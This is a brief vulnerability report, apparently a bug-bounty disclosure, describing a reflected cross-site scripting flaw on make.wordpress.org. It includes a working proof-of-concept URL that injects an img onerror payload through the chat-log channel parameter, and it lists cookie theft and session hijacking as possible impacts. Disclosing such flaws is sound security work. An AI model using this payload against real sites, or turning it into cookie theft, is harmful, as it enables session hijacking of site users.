Hi there, I just found a reflected XSS on make.wordpress.org domain.
steps to reproduce :
- visit this link : https://make.wordpress.org/chat/logs?channel=16%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&date=2019-07-21&no_bots=1
- xss pop up will occurs
POC: see:wp reflected xss.png
Note: it works on the latest version of firefox
some of xss impact like stealing cookies, session hijacking, etc ..